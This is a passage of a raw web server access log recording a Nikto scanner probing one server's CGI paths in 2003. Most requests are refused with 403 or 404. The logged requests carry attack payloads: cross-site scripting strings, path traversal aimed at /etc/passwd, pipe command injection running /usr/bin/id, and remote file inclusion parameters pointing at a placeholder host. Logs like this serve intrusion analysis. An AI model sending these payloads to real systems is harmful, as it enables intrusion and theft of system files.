(Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:39 +0900] "200 /cgi-bin/ HTTP/1.0" 403 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:40 +0900] "GET /cgi.cgi/ HTTP/1.0" 403 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:40 +0900] "GET /cgi-bin/ HTTP/1.0" 403 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:41 +0900] "GET /cgi.cgi/%2e%2e/abyss.conf HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:42 +0900] "GET /cgi-bin/%2e%2e/abyss.conf HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:42 +0900] "GET /cgi.cgi/.access HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:43 +0900] "GET /cgi-bin/.access HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:44 +0900] "GET /cgi.cgi/.cobalt HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:45 +0900] "GET /cgi-bin/.cobalt HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:45 +0900] "GET /cgi.cgi/.cobalt/alert/service.cgi?service=<h1>Hello!</h1><script>alert('Vulnerable')</script> HTTP/1.0" 403 309 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:46 +0900] "GET /cgi-bin/.cobalt/alert/service.cgi?service=<h1>Hello!</h1><script>alert('Vulnerable')</script> HTTP/1.0" 404 305 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:47 +0900] "GET /cgi.cgi/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')> HTTP/1.0" 403 309 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:47 +0900] "GET /cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')> HTTP/1.0" 404 305 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:48 +0900] "GET /cgi.cgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> HTTP/1.0" 403 309 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:49 +0900] "GET /cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> HTTP/1.0" 404 305 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:50 +0900] "GET /cgi.cgi/.fhp HTTP/1.0" 403 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:50 +0900] "GET /cgi-bin/.fhp HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:51 +0900] "GET /cgi.cgi/.htaccess HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:52 +0900] "GET /cgi-bin/.htaccess HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:52 +0900] "GET /cgi.cgi/.htaccess.old HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:53 +0900] "GET /cgi-bin/.htaccess.old HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:54 +0900] "GET /cgi.cgi/.htaccess.save HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:55 +0900] "GET /cgi-bin/.htaccess.save HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:55 +0900] "GET /cgi.cgi/.htaccess~ HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:56 +0900] "GET /cgi-bin/.htaccess~ HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:57 +0900] "GET /cgi.cgi/.htpasswd HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:57 +0900] "GET /cgi-bin/.htpasswd HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:58 +0900] "GET /cgi.cgi/.namazu.cgi HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:45:59 +0900] "GET /cgi-bin/.namazu.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:00 +0900] "GET /cgi.cgi/.passwd HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:00 +0900] "GET /cgi-bin/.passwd HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:01 +0900] "GET /cgi.cgi//ans/ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:02 +0900] "GET /cgi-bin//ans/ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:02 +0900] "GET /cgi.cgi//astrocam.cgi HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:03 +0900] "GET /cgi-bin//astrocam.cgi HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:04 +0900] "GET /cgi.cgi//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/ HTTP/1.0" 403 329 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:05 +0900] "GET /cgi-bin//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/ HTTP/1.0" 404 325 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:05 +0900] "GET /cgi.cgi//blog/ HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:06 +0900] "GET /cgi-bin//blog/ HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:07 +0900] "GET /cgi.cgi//blog/mt-check.cgi HTTP/1.0" 403 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:07 +0900] "GET /cgi-bin//blog/mt-check.cgi HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:08 +0900] "GET /cgi.cgi//blog/mt-load.cgi HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:10 +0900] "GET /cgi-bin//blog/mt-load.cgi HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:11 +0900] "GET /cgi.cgi//blog/mt.cfg HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:11 +0900] "GET /cgi-bin//blog/mt.cfg HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:12 +0900] "GET /cgi.cgi//errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/ HTTP/1.0" 403 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:13 +0900] "GET /cgi-bin//errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/ HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:14 +0900] "GET /cgi.cgi//GW5/GWWEB.EXE?HELP=bad-request HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:14 +0900] "GET /cgi-bin//GW5/GWWEB.EXE?HELP=bad-request HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:15 +0900] "GET /cgi.cgi//GWWEB.EXE?HELP=bad-request HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:16 +0900] "GET /cgi-bin//GWWEB.EXE?HELP=bad-request HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:16 +0900] "GET /cgi.cgi//mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00 HTTP/1.0" 403 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:17 +0900] "GET /cgi-bin//mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00 HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:18 +0900] "GET /cgi.cgi//mt-static/ HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:19 +0900] "GET /cgi-bin//mt-static/ HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:19 +0900] "GET /cgi.cgi//mt-static/mt-check.cgi HTTP/1.0" 403 307 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:20 +0900] "GET /cgi-bin//mt-static/mt-check.cgi HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:21 +0900] "GET /cgi.cgi//mt-static/mt-load.cgi HTTP/1.0" 403 306 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:22 +0900] "GET /cgi-bin//mt-static/mt-load.cgi HTTP/1.0" 404 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:22 +0900] "GET /cgi.cgi//mt-static/mt.cfg HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:23 +0900] "GET /cgi-bin//mt-static/mt.cfg HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:24 +0900] "GET /cgi.cgi//mt/ HTTP/1.0" 403 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:24 +0900] "GET /cgi-bin//mt/ HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:25 +0900] "GET /cgi.cgi//mt/mt-check.cgi HTTP/1.0" 403 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:26 +0900] "GET /cgi-bin//mt/mt-check.cgi HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:27 +0900] "GET /cgi.cgi//mt/mt-load.cgi HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:27 +0900] "GET /cgi-bin//mt/mt-load.cgi HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:28 +0900] "GET /cgi.cgi//mt/mt.cfg HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:29 +0900] "GET /cgi-bin//mt/mt.cfg HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:30 +0900] "GET /cgi.cgi//nimages.php HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:30 +0900] "GET /cgi-bin//nimages.php HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:31 +0900] "GET /cgi.cgi//rightfax/fuwww.dll/? HTTP/1.0" 403 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:32 +0900] "GET /cgi-bin//rightfax/fuwww.dll/? HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:32 +0900] "GET /cgi.cgi//scripts/*%0a.pl HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:33 +0900] "GET /cgi-bin//scripts/*%0a.pl HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:34 +0900] "GET /cgi.cgi//SGB_DIR/superguestconfig HTTP/1.0" 403 309 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:35 +0900] "GET /cgi-bin//SGB_DIR/superguestconfig HTTP/1.0" 404 305 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:35 +0900] "GET /cgi.cgi//smartsearch.cgi HTTP/1.0" 403 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:36 +0900] "GET /cgi-bin//smartsearch.cgi HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:37 +0900] "GET /cgi.cgi//smartsearch/smartsearch.cgi HTTP/1.0" 403 312 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:37 +0900] "GET /cgi-bin//smartsearch/smartsearch.cgi HTTP/1.0" 404 308 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:38 +0900] "GET /cgi.cgi/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:39 +0900] "GET /cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:40 +0900] "GET /cgi.cgi/14all.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:40 +0900] "GET /cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:41 +0900] "GET /cgi.cgi/a1disp3.cgi?../../../../../../../../../../etc/passwd HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:42 +0900] "GET /cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:42 +0900] "GET /cgi.cgi/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd HTTP/1.0" 403 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:43 +0900] "GET /cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:44 +0900] "GET /cgi.cgi/a1stats/a1disp3.cgi?../../../../../../../etc/passwd HTTP/1.0" 403 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:45 +0900] "GET /cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:45 +0900] "GET /cgi.cgi/a1stats/a1disp4.cgi?../../../../../../../etc/passwd HTTP/1.0" 403 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:46 +0900] "GET /cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:47 +0900] "GET /cgi.cgi/addbanner.cgi HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:47 +0900] "GET /cgi-bin/addbanner.cgi HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:48 +0900] "GET /cgi.cgi/adduser.cgi HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:49 +0900] "GET /cgi-bin/adduser.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:50 +0900] "GET /cgi.cgi/add_ftp.cgi HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:50 +0900] "GET /cgi-bin/add_ftp.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:51 +0900] "GET /cgi.cgi/admin.cgi HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:52 +0900] "GET /cgi-bin/admin.cgi HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:52 +0900] "GET /cgi.cgi/admin.cgi?list=../../../../../../../../../../etc/passwd HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:53 +0900] "GET /cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:54 +0900] "GET /cgi.cgi/admin.php HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:55 +0900] "GET /cgi-bin/admin.php HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:55 +0900] "GET /cgi.cgi/admin.php3 HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:56 +0900] "GET /cgi-bin/admin.php3 HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:57 +0900] "GET /cgi.cgi/admin.pl HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:57 +0900] "GET /cgi-bin/admin.pl HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:58 +0900] "GET /cgi.cgi/adminhot.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:46:59 +0900] "GET /cgi-bin/adminhot.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:00 +0900] "GET /cgi.cgi/adminwww.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:00 +0900] "GET /cgi-bin/adminwww.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:01 +0900] "GET /cgi.cgi/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:02 +0900] "GET /cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:03 +0900] "GET /cgi.cgi/aglimpse HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:03 +0900] "GET /cgi-bin/aglimpse HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:04 +0900] "GET /cgi.cgi/aglimpse.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:05 +0900] "GET /cgi-bin/aglimpse.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:05 +0900] "GET /cgi.cgi/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 HTTP/1.0" 403 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:06 +0900] "GET /cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:07 +0900] "GET /cgi.cgi/alibaba.pl|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\, HTTP/1.0" 403 328 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:09 +0900] "GET /cgi-bin/alibaba.pl|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\, HTTP/1.0" 404 324 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:09 +0900] "GET /cgi.cgi/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:10 +0900] "GET /cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:11 +0900] "GET /cgi.cgi/amadmin.pl HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:11 +0900] "GET /cgi-bin/amadmin.pl HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:12 +0900] "GET /cgi.cgi/anacondaclip.pl?template=../../../../../../../../../../etc/passwd HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:13 +0900] "GET /cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:14 +0900] "GET /cgi.cgi/ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:14 +0900] "GET /cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:15 +0900] "GET /cgi.cgi/AnyBoard.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:16 +0900] "GET /cgi-bin/AnyBoard.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:16 +0900] "GET /cgi.cgi/AnyForm HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:17 +0900] "GET /cgi-bin/AnyForm HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:18 +0900] "GET /cgi.cgi/AnyForm2 HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:19 +0900] "GET /cgi-bin/AnyForm2 HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:19 +0900] "GET /cgi.cgi/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/ HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:20 +0900] "GET /cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/ HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:21 +0900] "GET /cgi.cgi/architext_query.cgi HTTP/1.0" 403 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:22 +0900] "GET /cgi-bin/architext_query.cgi HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:22 +0900] "GET /cgi.cgi/architext_query.pl HTTP/1.0" 403 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:23 +0900] "GET /cgi-bin/architext_query.pl HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:24 +0900] "GET /cgi.cgi/ash HTTP/1.0" 403 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:24 +0900] "GET /cgi-bin/ash HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:25 +0900] "GET /cgi.cgi/AT-admin.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:26 +0900] "GET /cgi-bin/AT-admin.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:27 +0900] "GET /cgi.cgi/AT-generate.cgi HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:27 +0900] "GET /cgi-bin/AT-generate.cgi HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:47:28 +0900] "GET /cgi.cgi/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[[' HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 